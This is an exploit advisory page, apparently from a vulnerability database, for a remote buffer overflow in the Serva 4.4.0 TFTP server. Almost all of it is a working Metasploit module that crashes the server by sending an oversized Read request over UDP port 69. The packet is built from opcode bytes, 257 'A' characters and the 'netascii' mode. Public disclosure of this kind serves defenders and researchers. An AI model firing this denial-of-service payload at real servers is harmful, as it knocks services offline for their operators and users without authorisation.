Serva 4.4.0 TFTP Remote Buffer Overflow

2021.11.24
Credit: Yehia Elghaly
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-119

# Exploit Title: Serva 4.4.0 TFTP Server Remote Buffer Overflow (Metasploit) # Date: 2021-11-23 # Exploit Author: Yehia Elghaly # Vendor Homepage: https://www.vercot.com/ # Software Link : https://www.vercot.com/~serva/download/Serva_Community_v4.4.0-21081411.zip # Tested Version: 4.4.0 # Tested on: Windows XP SP3 - Windows 7 Professional x86 SP1 - Windows 10 x64 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Udp include Msf::Auxiliary::Dos Rank = ExcellentRanking def initialize(info = {}) super(update_info(info, 'Name' => 'Serva 4.4.0 TFTP Remote Buffer Overflow', 'Description' => %q{ The Serva TFTP server version 4.4.0 can be brought down by sending a special Read request. }, 'Author' => 'Yehia Elghaly', 'License' => MSF_LICENSE, 'DisclosureDate' => '2021-11-23')) register_options([Opt::RPORT(69)]) end def run connect_udp print_status("Sending Read request...") sploit = "\x00\x01" sploit += "A" * 257 sploit += "\x00" sploit += "netascii" sploit += "\x00" udp_sock.put(sploit) disconnect_udp end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top